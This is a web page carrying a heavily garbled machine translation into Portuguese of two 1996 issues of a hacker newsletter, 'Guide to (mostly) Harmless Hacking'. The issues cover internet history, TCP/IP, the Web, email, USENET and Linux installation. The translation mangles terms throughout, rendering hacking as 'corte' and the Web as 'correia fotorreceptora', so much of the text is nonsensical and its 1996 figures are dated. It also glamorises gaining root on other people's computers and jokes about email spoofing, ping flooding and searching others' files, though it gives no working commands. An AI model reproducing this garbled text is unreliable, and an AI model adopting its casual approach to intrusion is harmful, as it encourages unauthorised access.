SlideShare uma empresa Scribd logo
Corte para manequins 
Índices do volume 2: 
Internet para manequins 
Linux! 
Introdução ao TCP/IP 
Surfar portuário! 
__________________________________________________________ 
GUIA (na maior parte) AO CORTE INOFENSIVO 
Vol. 2 número 1 
Internet para manequins -- saltar isto se você é um feiticeiro de Unix. Mas se você lê em você começ um pouco mais de kewl que corta instruções. 
__________________________________________________________ 
Os seis guias (na maior parte) ao corte inofensivo de Vol. 1 saltaram imediatamente como-em cortar truques. Mas se você é como mim, todos aqueles detalhes de portos probing e de jogo com hipóteses e de sibilar abaixo dos anfitriões começ pouco dizzying. 
Assim como sobre o travamento de nossa respiração, estando para trás e revendo o que é esse nós é jogar com? Uma vez que nós começ os princípios sob o controle, nós então podemos transportar-se sobre o corte sério. 
Também, eu wrestling com minha consciência sobre se começar dar-lhe instruções passo a passo em como ganhar a raiz alcanço computadores de outros povos'. O anjo pequeno em meu ombro direito sussurra, “ganhando a raiz sem permissão em computadores do outro pessoa não é agradável. Assim não dizer a povos como fazê- lo.” O diabo pequeno em meu ombro esquerdo diz, “Carolyn, todos estes cabouqueiros pensa que você não sabe o nothin'! PROOVE a eles você sabe rachar- se!” O anjo pequeno diz, “se qualquer um guia da leitura (na maior parte) ao corte inofensivo amarra para fora este truque, você pôde conseguir no problema com a lei para que a conspiração danifique outros povos' os computadores.” O diabo pequeno diz, “mas, Carolyn, diz a povos como rachar-se na raiz e pensarão que você é KEWL!” 
Está tão aqui o negócio. Nesta e nas próximas introduções do guia (na maior parte) inofensivo ao corte eu dir-lhe-ei diversas maneiras de começ entrado como o superuser no cliente de raiz de alguns computadores de anfitrião do Internet. Mas as instruções deixarão uma coisa ou dois à imaginação. 
Minha teoria é que se você é disposto vadear com o todo o isto, você não é provavelmente um daqueles presunçosos baratos do cabouqueiro das emoções que usariam este conhecimento para fazer algo destrutivo que o aterraria na cadeia. 
***************************** 
Ponta técnica: Se você deseja se transformar um cabouqueiro do *serious*, você precisará o linux (uma variedade do freeware de Unix) em seu PC. Uma razão é que então você pode se rachar na raiz legalmente tudo que você quer -- em seu próprio computador. As batidas certas que esforçam-se ao redor em alguma outra pessoa o computador para descobrir somente que o que você o pensamento era a raiz era uma armadilha inteligente ajustada e o sysadmin e o FBI ri de você toda a maneira de encarcerar.
O linux pode ser instalado em um PC com tão pouco quanto 386 um processador central, um RAM de somente 2 Mb e tão pouco quanto MB 20 do disco rígido. Você precisará de reformat seu disco rígido. Quando alguns povos instalarem com sucesso o linux sem trashing seu material de DOS/Windows, não contar na obtenção afastado com ela. Apoio, apoio, apoio! 
***************************** 
***************************** 
Você pode ir encarcerar o aviso: A rachadura na raiz em alguma outra pessoa computador e o slammer transforma-se uma possibilidade definitiva. Pensar sobre isto: quando você ver uma notícia sobre algum cabouqueiro que começ rebentado, como frequentemente você reconhecem o nome? O busto o mais atrasado está sendo feito como frequentemente a alguém famoso, como o Tangent escuro ou o se7en ou o Emmanuel Goldstein? Como sobre, como, nunca! Isso é porque os cabouqueiros realmente bons figuram para fora como não fazer o material estúpido. Aprendem como rachar-se em computadores para o desafio intelectual e figurar para fora como fazer computadores seguros dos intrusos. Não fazem touro sua maneira na raiz e para fazer uma confusão das coisas, que tenda a inspirar sysadmins chamar as bobinas. 
********************************* 
Observação emocionante: É que fura demasiado para cortar apenas em sua própria máquina do linux? Cair dentro lá. O IRA Winkler da associação nacional da segurança de computador, o decano Garlick do laboratório da dinâmica do espaço da universidade de estado de Utá e eu estão trabalhando em setting-up hack.net, um lugar onde será legal quebrar em computadores. Não somente que, nós estamos procurando os patrocinadores que dão concessões e bolsas de estudos de dinheiro àquelas que mostram as grandes habilidades de corte. Faz agora esse soam como mais phun do que a cadeia? 
***************************** 
Assim, deixar-nos saltar em nossos princípios de corte tutoriais com um olhar na anarquia maravilhoso que é o Internet. 
Anotar que estes guias (na maior parte) ao foco de corte inofensivo no Internet. Isso é porque há muitas maneiras legais de cortar no Internet. Também, há sobre 10 milhões destes computadores prontamente hackable no Internet, e o número cresce diário. 
Princípios do Internet 
Ninguém possui o Internet. Ninguém funcionamentos ele. Nunca planeou-se ser o que é hoje. Apenas aconteceu, a conseqüência do mutante de uma experiência do Defense Advanced Research Projects Agency de 1969 E.U. 
Sobras anárquicas deste sistema amarradas junto porque seus usuários obedecem voluntàriamente algumas réguas básicas. Estas réguas podem ser resumidas em duas palavras: Unix e TCP/IP (com um assentimento ao UUCP). Se você compreende, compreender verdadeiramente Unix e TCP/IP (e UUCP), você transformar-se-á uma natação dos peixes no mar do Cyberspace, um Uberhacker entre presunçosos do cabouqueiro, um mestre do universo do Internet. 
Para começ técnico, o Internet é uma rede distribuída mundial do computador/comunicações mantida unida por um padrão comum das comunicações, pelo Transmission Control Protocol/Internet Protocol (TCP/IP) e por um bocado do
UUCP. Estes padrões permitem que qualquer um enganche acima de um computador ao Internet, que se transforma então um outro nó nesta rede do Internet. Tudo que é necessário é começ um internet address atribuído ao computador novo, que é sabido então porque um Internet “anfitrião,” e laço em uma ligação de comunicações do Internet. Estas ligações estão agora disponíveis em quase todas as partes do mundo. 
Se você usa um serviço online de seu computador pessoal, você, também, pode temporariamente transformar-se parte do Internet. Há duas maneiras principais de enganchar até um serviço online. 
Há a conexão da batata do cybercouch que cada newbie usa. Exige um ponto apontar (PPP) ou SLIPconnection, que permitam que você funcione retratos bonitos com seu web browser. Se você começ alguma sorte do software empacotado de seu ISP, dá-lhe automaticamente esta sorte da conexão. 
Ou você pode conectar com um terminal emulator a um anfitrião do Internet. Este programa pode ser algo tão simples quanto Windows 3.1 programa “terminal” sob o ícone dos “acessórios”. Uma vez que você discou dentro e conectou você é apenas um outro terminal neste computador central. Não lhe dará retratos bonitos. Esta conexão será similar a o que você começ em um BBS antiquado. Mas se você sabe usar este tipo da conexão, poderia mesmo dar-lhe o acesso da raiz a esse anfitrião. 
Mas como o computador de anfitrião você uso é unido ao Internet? Estará funcionando alguma variedade do sistema de exploração de Unix. Desde que Unix é tão fácil de se adaptar a quase todo o computador, este significa que quase qualquer computador pode se transformar um anfitrião do Internet. 
Por exemplo, eu entro às vezes no Internet através de um anfitrião que seja um computador do Indigo de Silicon Graphics na universidade de estado de Utá. Seu internet address é fantasia.idec.sdl.usu.edu. Este é um computador aperfeiçoado para o trabalho da animação de computador, mas pode igualmente operar-se como um anfitrião do Internet. Em outras ocasiões o ponto de entrada usado pode ser pegasus.unm.edu, que é um modelo 370 de IBM RS 6000. Este é um computador aperfeiçoado para a pesquisa na universidade de New mexico. 
Algum computador que puder funcionar o software necessário -- qual é basicamente o sistema de exploração de Unix -- tem um modem, e é amarrado a uma ligação de comunicações do Internet, pode transformar-se um nó do Internet. Mesmo um PC pode transformar-se um anfitrião do Internet funcionando um dos sabores do linux de Unix. Após o ajuste acima com linux você pode arranjar com o ISP de sua escolha para lig permanentemente o ao Internet. 
De facto, muitos ISPs não usam nada os PCes mais do que conectados que funcionam o linux! 
Em conseqüência, a toda a computação, armazenamento de dados, e emissão, recepção e transmissão das mensagens no Internet são segurados pelos milhões dos computadores de muitos tipos e possuídos por companhias incontáveis, por instituições educativas, por entidades governamentais e mesmo por indivíduos. 
Cada um destes computadores tem um endereço individual que o permita de ser alcangado através do Internet se enganchado até uma ligação de comunicações apropriada. Este endereço pode ser representado em duas maneiras: como um nome ou um número.
As ligações de comunicações do Internet igualmente são possuídas e mantidas na mesma forma anárquica que os anfitriões. Cada proprietário de um anfitrião do Internet é responsável para encontrar e pagar por uma ligação de comunicações que começ esse anfitrião amarrado dentro com pelo menos outro um anfitrião. As ligações de comunicações podem ser tão simples quanto uma linha telefónica, uma ligação de dados sem fio tal como dados de pacote digitais celulares, ou tão complicadas quanto uma ligação de alta velocidade da fibra óptica. Contanto que a ligação de comunicações puder usar o TCP/IP ou o UUCP, pode caber no Internet. 
Assim a rede cresce sem a coordenação total. Um novo proprietario de uma necessidade do anfitrião do Internet começ somente a permissão amarrar em uma ligação de comunicações outro a um anfitrião. Alternativamente, se o fornecedor da ligação de comunicações decide este anfitrião é, por exemplo, um abrigo para spammer, pode cortar este “local desonesto” fora do Internet. O local desonesto então deve snooker alguma outra ligação de comunicações em amarrá-la no Internet outra vez. 
A maneira mais destes computadores interconectados e de trabalho das ligações de comunicações é com a língua comum do protocolo do TCP/IP. Basicamente, o TCP/IP quebra toda a comunicação do Internet em “pacotes discretos.” Cada pacote inclui a informação em como distribuir a, de correcção de erros, e os endereços do remetente e do receptor. A idéia é que se um pacote é perdido, o remetente o saberá e o enviará novamente o pacote. Cada pacote é lanç então no Internet. Esta rede pode automaticamente escolher uma rota do nó ao nó para cada pacote using o que quer que está disponível naquele tempo, e remonta os pacotes na mensagem completa no computador a que foi endereçada. 
Estes pacotes podem seguir rotas tortuosas. Por exemplo, um pacote pode ir de um nó em Boston a Amsterdão e de volta aos E.U. para o destino final em Houston, quando um outro pacote da mesma mensagem pôde ser distribuído através de Tokyo e de Atenas, e assim por diante. Geralmente, entretanto, as ligações de comunicações não são quase tão torturous. As ligações de comunicações podem incluir fibras ópticas, linhas telefónicas e satélites. 
A força desta rede comutável por blocos é que a maioria de mensagens começ automaticamente completamente apesar do engarrafamento pesado da mensagem e muitas das ligações de comunicações que estão para fora - de - serviço. A desvantagem é que as mensagens podem simplesmente desaparecer dentro do sistema. Igualmente pode ser difícil alcangar computadores desejados se ligações de comunicações demais são não disponíveis naquele tempo. 
Entretanto, todas estas características maravilhosas são igualmente profunda hackable. O Internet é robusto bastante sobreviver -- assim sua reivindicação dos inventores -- mesmo guerra nuclear. Contudo é igualmente tão fraco que com somente um pouco da instrução, é possível aprender como spoof seriamente o sistema (email forjado) ou mesmo põr temporariamente fora da comissão computadores de anfitrião do Internet do outro pessoa (a inundação que sibila, por exemplo.) 
De um lado, os encabeçamentos nos pacotes que carreg o corte de comandos dão afastado a informação de cliente de que um cabouqueiro se está operando. Para for duro esconder perfeitamente quando no Internet.
É esta tensão entre estes poder e vigor e fraqueza e potencial para a confusão que faz ao Internet um campo de jogos do cabouqueiro. 
Por exemplo, ESTÁ AQUI SEU Tip que do CABOUQUEIRO VOCÊ TEM ESPERADO ESTA EDIÇÃO: 
ftp://ftp.secnet.com 
Este ftp site foi afixado na lista de BUGTRAQ, que é dedicada ao exame de buracos em a segurança de Unix. O monitor é Aleph um, que é um Uberhacker genuíno. Se você quer subscrever ao BUGTRAQ, o email LISTSERV@netspace.org com mensagem “subscreve BUGTRAQ.” 
Agora, de volta aos princípios do Internet. 
História do Internet 
Como mencionado acima, o Internet era nascido como um esforço avançado E.U. da agência dos projectos de investigação em 1969. Seus inventores chamaram-no ARPANET. Mas por causa de seu valor na investigação científica, o National Science Foundation dos E.U. tomou-a sobre em 1983. Mas sobre os anos desde então evoluiu gradualmente longe de toda a única fonte de controle. Em abril de 1995 o NSF cortou as últimas cordas de avental. O Internet é funcionado agora por ninguém. Apenas acontece e cresce fora dos esforços daqueles que jogam com ele e se esforçam com o software e a ferragem. 
Nada como este tem acontecido nunca antes. Nós temos agora um sistema informático com uma vida do seus próprios. Nós, como cabouqueiros, fazemos parte grande do motor da mutação que mantem o Internet evoluir e crescer mais forte. Nós igualmente fazemos parte grande do sistema imunitário desta criatura exótica. 
A idéia original de ARPANET era projectar um computador e uma rede de comunicações que se tornassem eventualmente tão redundantes, tão um robusto, e um tão capaz de operar-se sem controle centralizado, que poderia mesmo sobreviver à guerra nuclear. O que igualmente aconteceu era esse ARPANET evoluído ser que sobreviveu ao fim do financiamento do governo sem mesmo uma resposta em seu crescimento. Assim sua prole anárquica, o Internet, sucedeu além dos sonhos os mais selvagens de seus arquitetos originais. 
O Internet cresceu explosiva, sem a extremidade na vista. Em seu início como ARPANET ele prendeu somente 4 anfitriões. Um quarto de alta velocidade mais tarde, em 1984, conteve somente 1000 anfitriões. Mas durante os próximos 5 anos este número cresceu decuplamente a 10.000 (1989). Sobre os seguintes 4 anos cresceu outro decuplamente a 1 milhão (1993). Dois anos mais tarde, no fim de 1995, o Internet foi estimado para ter pelo menos 6 milhão computadores de anfitrião. Há provavelmente sobre 10 milhões agora. Não parece estar nenhuma extremidade na vista contudo ao crescimento incrível desta criança do mutante de ARPANET. 
De facto, um interesse levantado pelo crescimento exponencial no Internet é que a demanda pode eventualmente capacidade distante do outrace. Porque agora nenhuma entidade possui ou controla o Internet, se a capacidade das ligações de comunicações entre nós é demasiado pequena, e era se tornar atolada seriamente, pôde ser difícil reparar o problema. 
Por exemplo, em 1988, Robert Morris, Jr. desencadeou um “vírus” - dactilografar o programa no Internet conhecido geralmente como de “o sem-fim Morris.” Este vírus
faria cópias dse em o que computador estava ligada e para emitir então cópias sobre as ligações de comunicações a outros anfitriões do Internet. (Usou um erro no sendmail que permitiu o acesso à raiz, permitindo que o vírus actue como o superuser). 
Rapidamente a propagação exponencial deste vírus fêz o Internet desmoronar do tráfego de comunicações e do espaço que de disco amarrou acima. 
Então o Internet estava ainda sob alguma semelhança do controle pelo National Science Foundation e foi conectado somente a alguns mil computadores. A rede foi interrompida e todos os vírus foram removidos de seus computadores de anfitrião, e a rede foi põr então de novo na operação. Morris, entrementes, foi na cadeia. 
Havido algum interesse que, apesar das medidas de segurança melhoradas (por exemplo, “guarda-fogos”), alguém pode encontrar uma maneira nova de lanç um vírus que poderia outra vez interromper o Internet. Dado a perda de controle centralizado, reiniciá-la poderia ser muito mais demorado se este era acontecer outra vez. 
Mas restabelecendo um controle centralizado gostar hoje do que existiu na altura de “do sem-fim Morris” é provável ser impossível. Mesmo se era possível, os arquitetos de ARPANET do original estavam provavelmente correctos em sua avaliação que a rede se tornaria mais suscetível para a falha maciça um pouco do que menos se algum controle centralizado era in place. 
Talvez a única característica a mais significativa do Internet de hoje é esta falta do controle centralizado. Nenhuma pessoa ou organização podem agora controlar o Internet. De facto, a dificuldade do controle transformou-se uma edição assim que seu primeiro ano de operação como ARPANET. Nesse ano o email foi inventado espontâneamente por seus usuários. À surpresa de gerentes de ARPANET, pelo segundo email do ano esclareceu o volume da comunicação sobre o sistema. 
Porque o Internet tinha vindo ter um inteiramente autônomo, descentralizado a vida do seus próprios, em abril de 1995, o NSF parado financiando NSFNET, a espinha dorsal das comunicações das fibras ópticas que tinha dado ao mesmo tempo a NSF a tecnologia para controlar o sistema. A proliferação das ligações e de anfitriões paralelos de comunicações até lá tinha contorneado completamente toda a possibilidade de controle centralizado. 
Há diversas características principais do Internet: 
* World Wide Web -- uma rede de publicação do hypertext e agora a parte a mais em crescimento rápido do Internet. 
* email -- uma maneira de emitir mensagens eletrônicas 
* USENET -- fóruns em que os povos podem afixar e mensagens do público da vista 
* telnet -- uma maneira de entrar aos computadores remotos do Internet 
* File Transfer Protocol -- uma maneira de transferir limas dos computadores remotos do Internet 
* Internet Relay Chat -- conversações tempos real do texto -- usado primeiramente por cabouqueiros e por outros veteranos do Internet 
* Gopher -- uma maneira de catalogar e de procurarar pela informação. Isto está crescendo ràpida obsoleto. 
Enquanto você move os surfistas sabem, lá são dúzias de outros serviços interessantes mas menos conhecidos tais como WHOIS, dedo, sibilo etc.
O World Wide Web 
O World Wide Web é a característica principal a mais nova do Internet, datando da mola de 1992. Consiste nos “Web pages,” que são como páginas em um livro, e nas ligações das palavras, das frases ou dos símbolos especialmente marcados em cada página a outros Web pages. Estas páginas e ligações criam junto o que é sabido como o “hypertext.” Esta técnica torna possível amarrar junto muitos originais diferentes que podem ser redigidos por muitos povos e ser armazenados em muitos computadores diferentes em torno do mundo em um original do hypertext. 
Esta técnica é baseada no padrão universal do localizador do recurso, que especific como enganchar acima com o computador e alcançar as limas dentro dela onde os dados de um Web page podem ser armazenados. 
Um URL é sempre do formulário http:// o mais <rest do address>, onde <rest do address> inclui um Domain Name que deva ser registado com uma organização chamada InterNIC a fim se certificar de que dois Web pages diferentes (ou os email address, ou os endereços de computador) não terminam acima ser idênticos. Este registo é uma de poucas características do controle centralizado do Internet. 
É aqui como o hypertext do World Wide Web trabalha. O leitor viria a uma indicação tal como “nosso serviço do caminhão do LTL das ofertas da companhia a todas as cidades principais dos E.U.” Se esta indicação no “Web page” é destacada, esse significa que um clique do rato do computador do leitor a tomará o ou a um Web page novo com detalhes. Estes podem incluir programações completas e um formulário para completar para requisitar um colector e uma entrega. 
Alguns Web pages oferecem mesmo maneiras de fazer pagamentos eletrônicos, geralmente através dos cartões de crédito. 
Entretanto, a segurança de transferências de dinheiro sobre o Internet é ainda um tema importante. Contudo apesar estar relacionados com verifiability de transacções financeiras, o comércio eletrônico sobre a correia fotorreceptora está crescendo rapidamente. Em seu segundo ano cheio de existência, 1994, somente uns $17.6 milhões nas vendas foram conduzidos sobre a correia fotorreceptora. Mas em 1995, as vendas alcangaram $400 milhões. Hoje, em 1996, a correia fotorreceptora é atolada com os locais comerciais que imploram por sua informação do cartão de crédito. 
Além, a correia fotorreceptora está sendo usada como uma ferramenta na distribuição de um formulário novo da moeda, conhecido como o dinheiro eletrônico. É concebível que, se o obstáculo do verifiability pode ser superado, esse dinheiro eletrônico (chamado frequentemente moeda electrónico) pode jogar um maior protagonismo na economia mundial, simplificando o comércio internacional. Pode igualmente eventualmente fazer moedas nacionais e mesmo tributação como nós a sabemos obsoleta. 
Os exemplos dos Web site onde um pode obter a moeda electrónico incluem o banco de Mark Twain de St Louis, MO (http://www.marktwain.com) e Digicash de Amsterdão, os Países Baixos (http://www.digicash.com). 
Quase a natureza do para fora--controle do Internet manifesta-se no World Wide Web. O autor de um Web page não precisa de começ a permissão ou fazer nenhum arranjo com os autores de outros Web pages a que ou desejam estabelecer as ligações. As ligações podem ser estabelecidas automaticamente simplesmente programando nos URL das ligações desejadas do Web page.
Inversamente, a única maneira o autor de um Web page pode impedir outros povos da leitura ele ou estabelecer as ligações de hypertext a ele é setup um sistema de protecção da senha (ou não tendo as ligações de comunicações ao descanso do Internet). 
Um problema com o World Wide Web é como encontrar coisas nele. Apenas porque qualquer um pode enganchar um computador novo até o Internet, tão igualmente não há nenhuma autoridade central com controle ou mesmo conhecimento do que é publicado onde no World Wide Web. Ninguém necessidades de pedir a permissão de uma autoridade central colocar um Web page. 
Uma vez que um usuário sabe o endereço (URL) de um Web page, ou pelo menos o URL de um Web page que lig eventualmente à página desejada, a seguir é possível (contanto que as ligações de comunicações estão disponíveis) enganchar quase imediatamente acima com esta página. 
Por causa do valor de saber URL, há agora muitas companhias e instituições académicos que oferecem os índices procurado (situados na correia fotorreceptora) ao World Wide Web. Os programas automatizados tais como as esteiras rolantes de correia fotorreceptora procuraram a correia fotorreceptora e catalogam os URL que encontram enquanto viajam da ligação de hypertext à ligação de hypertext. Mas porque a correia fotorreceptora é constantemente crescente e em mudança, não há nenhuma maneira de criar um catálogo detalhado da correia fotorreceptora inteira. 
Email 
O email é o segundo uso o mais velho do Internet, datando do Arpanet de 1972. (O primeiro uso era permitir que os povos entrem remotamente a sua escolha de um dos quatro computadores em que Arpanet foi lanç em 1971.) 
Há dois usos principais do email: comunicações confidenciais, e email transmitido. Quando transmitido, o email sere para fazer anúncios (transmissão de sentido único), e para continuar as discussões entre grupos de pessoas tais como nosso cabouqueiro feliz alistam. Na modalidade da discussão de grupo, cada mensagem emitida por cada membro da lista é transmitida a todos membros restantes. 
Os dois tipos do programa o mais popular usados para transmitir para enviar por correio electrónico grupos de discussão são majordomo e listserv. 
USENET 
O USENET era uma conseqüência natural da lista de discussão transmitida do grupo do email. Um problema com lista do email é que não havia nenhuma forma facil para os povos novos a estes grupos se juntar lhes. Um outro problema é que como o grupo cresce, um membro pode ser inundado com dúzias ou centenas de mensagens de correio electrónico cada dia. 
Em 1979 estes problemas foram endereçados pelo lançamento do USENET. O USENET consiste nos grupos da notícia que continuam discussões sob a forma dos “bornes.” Ao contrário de um grupo de discussão do email, estes bornes são armazenados, tipicamente por duas semanas ou assim, esperando leitores potenciais. Porque os bornes novos são submetidos a um grupo da notícia, são transmissão a todos os anfitriões do Internet que são subscritos para carreg os grupos da notícia a que estes bornes pertencem. 
Com muitos programas da conexão a internet você pode ver as similaridades entre o USENET e o email. Ambos têm os encabeçamentos similares, que seguem seu movimento através da rede. Alguns programas tais como o pinho são emitidos até
emitem a mesma mensagem simultaneamente aos email address e aos newsgroup. Todos os leitores de notícia do USENET permitem você envie por correio electrónico os autores dos bornes, e muitos igualmente permitem que você envie por correio electrónico estes bornes eles mesmos a o senhor mesmo ou a outros povos. 
Agora, está aqui uma vista geral rápida dos princípios que do Internet nós planeamos cobrir em diversas introduções seguintes do guia (na maior parte) ao corte inofensivo: 
Unix 
Nós discutimos os “escudos” que permitem que se escreva programas (“certificados ") que automatizar série complicada de comandos de Unix. O leitor é introduzido ao conceito dos certificados que executam o corte de funções. Nós introduzimos o Perl, que é um linguagem de programação do escudo usado para a maioria de elite de cortar certificados tais como SATAN. 
TCP/IP e UUCP 
Este capítulo cobre as ligações de comunicações que ligam junto o Internet de uma perspectiva dos cabouqueiros. A atenção extra é dada ao UUCP desde que é tão hackable. 
Endereços, Domain Name e routeres do Internet 
O leitor aprende como a informação é emitida aos lugares direitos no Internet, e como os cabouqueiros podem o fazer ir aos lugares errados! Como olhar acima os anfitriões do UUCP (que não estão sob o Domain Name System) é incluída. 
Fundamentos do corte da elite: Portos, pacotes e permissões da lima 
Esta secção deixa os génios do corte sério fora do frasco. Oferece uma série de exercícios em que o leitor pode apreciar aceder a quase todo o anfitrião aleatòria escolhido do Internet. De facto, para o fim do capítulo o leitor terá tido a possibilidade praticar diversas técnicas dúzia para ganhar a entrada aos computadores de outros povos. Contudo estes cortes que nós ensinamos são 100% legal! 
_______________________________________________________ 
Querer subscrever a esta lista? O email hacker@techbroker.com com a mensagem “subscreve o happyhacker.” Querer compartilhar de algum stuph do kewl com a lista feliz do cabouqueiro? Emitir suas mensagens a hacker@techbroker.com. Para emitir-me o email confidencial (por favor, nenhuns exames das actividades ilegais) usar cmeinel@techbroker.com. Dirigir por favor flamas ao colaborador/null@techbroker.com. Corte feliz! 
Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. 
______________________________________________________ 
______________________________________ 
GUIA (na maior parte) AO CORTE INOFENSIVO 
Vol. 2 número 2 
Linux! 
______________________________________ 
Unix transformou-se o sistema de exploração do primo do Internet. De facto, Unix é o sistema de exploração o mais amplamente utilizado no mundo entre computadores com mais poder do que PCes.
Verdadeiro, Windows NT está vindo acima de rápido como um sistema de exploração do Internet da terra comum, e é o carrinho do sooo maravilhosamente em que olha como ele poderia assentar bem no favorito do número um a se rachar. Mas hoje Unix em todos seus sabores maravilhosos ainda é o sistema de exploração a saber verdadeiramente a fim ser um cabouqueiro da elite. 
Nós temos supor até agora que você tem using um cliente de escudo que você começ através de seu Internet Service Provider. Um cliente de escudo permite que você dê comandos de Unix em um de computadores do seu ISP. Mas você não precisa de depender de seu ISP para uma máquina que o deixe jogar com Unix. Você pode dirigir Unix em seu próprio computador e com um SLIP ou um PPP a conexão seja conectada directamente ao Internet. 
*********************** 
Nota do Newbie: As conexões da linha Internet Protocol de série e do Point-to-Point Protocol (PPP) dão-lhe um endereço provisório do Internet Protocol que permita que você seja enganchado directamente ao Internet. Você tem que usar conexões do SLIP ou do PPP para conseguir usar um web browser que lhe dê retratos preferivelmente no texto somente. Assim se você pode ver retratos na correia fotorreceptora, você já tem um destes disponíveis a você. 
A vantagem de usar uma destas conexões directas para suas actividades de corte é que você não sairá atrás de uma lima de registro do escudo para que o sysadmin do seu ISP pore sobre. Mesmo se você não está quebrando a lei, uma lima de registro do escudo que mostras você que faz lotes do stuph do cabouqueiro pode ser bastante para que alguns sysadmins fechem sumària seu cliente. 
******************** 
Que é o melhor tipo do computador para dirigir sobre Unix? A menos que você for um cabouqueiro rico que não pense nada de comprar uma estação de trabalho de Sun SPARC, você fará provavelmente melhor com alguma sorte do PC. Há as variações quase incontáveis de Unix que funcionam em PCes, e de alguns para Mac. A maioria deles estão livres para transferência, ou barata disponível nos CD-ROMs. 
As três variações as mais comuns de Unix que funcionam em PCes são solaris, FreeBSD e linux de Sun. Custos dos solaris em torno de $700. Bastante dito. FreeBSD é realmente, realmente bom. Mas você con't encontra muitos manuais ou newsgroup que cobrem FreeBSD. 
O linux, entretanto, tem a vantagem de estar disponível em muitas variações (assim que em você podem ter o divertimento programas misturar e combinar das ofertas diferentes do linux). Mais importante ainda, o linux é suportado por muitos manuais, grupos da notícia, lista do correio e Web site. Se você tem amigos do cabouqueiro em sua área, a maioria deles provavelmente linux do uso e podem ajudá-lo para fora. 
********************* 
Nota histórica: O linux foi criado em 1991 por um grupo conduzido por Linus Torvalds da universidade de Helsínquia. O linux é com direitos de autor sob a licença do general público do GNU. Sob este acordo, o linux pode ser redistribuído a qualquer um junto com o código fonte. Qualquer um pode vender toda a variação do linux e modificá-la e repackage a. Mas mesmo se alguém modifica o código fonte ele ou não pode reivindicar direitos reservados para qualquer coisa criado do linux. Qualquer um que vende uma versão modificada do linux deve fornecer o
código fonte aos compradores e permitir que reúso o em seus produtos comerciais sem taxas de licenciamento de carregamento. Este arranjo é sabido como um “copyleft.” 
Sob este arranjo os criadores originais do linux não recebem nenhuma taxa licenciar ou de shareware. Linus Torvalds e muito outro que contribuíram ao linux fêz assim da alegria da programação e de um sentido da comunidade com todos nós que usará esperançosamente o linux no espírito do corte do bom rapaz. Linux de Viva! Viva Torvalds! 
********************** 
O linux consiste no sistema de exploração próprio (chamado a “semente”) mais um jogo de programas associados. 
A semente, como todos os tipos de Unix, é uma multitarefa, sistema de exploração multi-user. Embora use uma estrutura de lima diferente, e daqui não seja directamente compatível com DOS e Windows, é tão flexível que muito os programas do DOS e de Windows puderem ser funcionados quando no linux. Assim um usuário de poder quererá provavelmente carreg acima no linux e então poder funcionar o DOS e os programas de Windows do linux. 
Os programas associados que vêm com a maioria de distribuições do linux podem incluir: 
* um programa do escudo (Bourne outra vez Shell -- FESTANÇA -- é o mais comum); 
* compiladores para linguagens de programação tais como Fortran-77 (meu favorito!), C, C++, Pascal, LISP, Modula-2, Ada, básico (a melhor língua para um novato), e Smalltalk.; 
* X (chamado às vezes X-janelas), uma interface de utilizador gráfica 
* programas de serviço público tais como o pinho do leitor do email (meu favorito) e o olmo 
Cobrir dez razões instalar o linux em seu PC: 
o linux 1.When outlawed, simplesmente os fora da lei possuirão o linux. 
Ao instalar o linux, é tanto divertimento para funcionar o fdisk sem suportar primeiramente. 
as flamas que 3.The você começ de fazer perguntas em newsgroup do linux são de um mais de alta qualidade do que as flamas você começ afixando a alt.sex.bestiality. 
4. Não importa o que o sabor do linux você instala, você encontrará que amanhã havia distante mais ersion que 3l1te você deve ter começ preferivelmente. 
5.People que usa o DEB ou solaris livres não fará o divertimento de você. Oferecerão sua simpatia preferivelmente. 
6.At o engodo seguinte de Def você poderá dizer que o stuph como “tão então mim su-ed a seu cliente e grepped todas suas limas para “o kissyface”.” Oops, grepping limas do outro pessoa é um no-no, esquecer que eu o sugeri nunca. 
ressaca 7.Port na privacidade. 
palavra 8.One: façanhas. 
o linux 9.Installing em seu PC do escritório é como ser um trabalhador postal e trazer um Uzi para trabalhar. 
10.But - - se você instala o linux em seu computador de escritório, você dirige não terá um indício o que esse significa.
Que tipos de linux trabalham melhor? Depende do que você quer realmente. Red Hat Linux é famoso para ser o mais fácil à instalação. O jogo do CD-ROM do linux 3.0 de Walnut Creek é igualmente realmente fácil de instalar -- para o linux, isso é! Minha aproximação foi começ lotes de versões do linux e misturar e combinar o melhor de cada distribuição. 
Eu gosto da versão de Walnut Creek melhor porque com minha ferragem do tipo X, sua característica do autodetection era um life-saver. 
INSTALAR O LINUX não é para o fraco do coração! Diversas pontas para a instalação da sobrevivência são: 
Embora você na teoria possa funcionar o linux em uns 286 com o RAM de 4 MB e duas movimentações flexíveis, é *much* mais fácil com uns 486 ou acima com o RAM de 8 MB, o espaço de um disco rígido do CD-ROM, e pelo menos dos 200 MB livre. 
Saber tanto quanto possível sobre que tipo de placa de mãe, de modem, de disco rígido, de cartão do CD-ROM, e o video você tem. Se você tem alguma documentação para estes, tê-los na mão a prover durante a instalação. 
Trabalha melhor para usar a ferragem que é nome-tipo e um tanto expirado em seu computador. Porque o linux é freeware, não oferece excitadores de dispositivo para toda a ferragem a mais atrasada. E se sua ferragem é como minhas -- lotes do stuph do tipo X e do EL Cheapo, você pode tomar um tempo longo que experimenta com que excitadores trabalharão. 
Antes da instalação do começo, suportar seu disco rígido! Na teoria você pode instalar o linux sem prejudicar suas limas de DOS/Windows. Mas nós somos tudo humanos, especialmente se seguindo o conselho do ponto 7). 
Começ mais de uma distribuição do linux. A primeira vez que eu instalei com sucesso o linux, eu bati finalmente em algo que trabalhou usando o disco de carregador de uma distribuição com o CD-ROM para outra. Em todo caso, cada distribuição do linux teve programas de serviço público diferentes, emuladores do sistema de exploração, compiladores e mais. Adicioná-los todos a seu sistema e você setup para tornar-se além da elite. 
Comprar um livro ou dois ou três no linux. Eu não gostei de alguns deles! Mas são melhores do que nada. A maioria de livros no linux vêm com um ou dois CD-ROMs que podem ser usados para instalar o linux. Mas eu encontrei que o que estava nos livros não coincidiu exactamente com o o que estava nos CD-ROMs. 
Eu recomendo beber ao instalar. Não pode fazer a eliminação de erros ir mais rapidamente, mas pelo menos você não se importará como duramente é. 
Agora eu posso quase garantir aquele mesmo seguinte todas estas 6 partes de conselho, você ainda terei problemas instalar o linux. Oh, eu tenho 7 advisories acima lá? Esquecer o número 7. Mas ser do bom elogio. Desde que todos mais igualmente sofre poderosa ao instalar e ao usar o linux, o Internet tem uma riqueza incrível dos recursos para o linux - desafiado. 
Se você é alérgico à obtenção inflamado, você pode começar com Web site da sustentação do linux. 
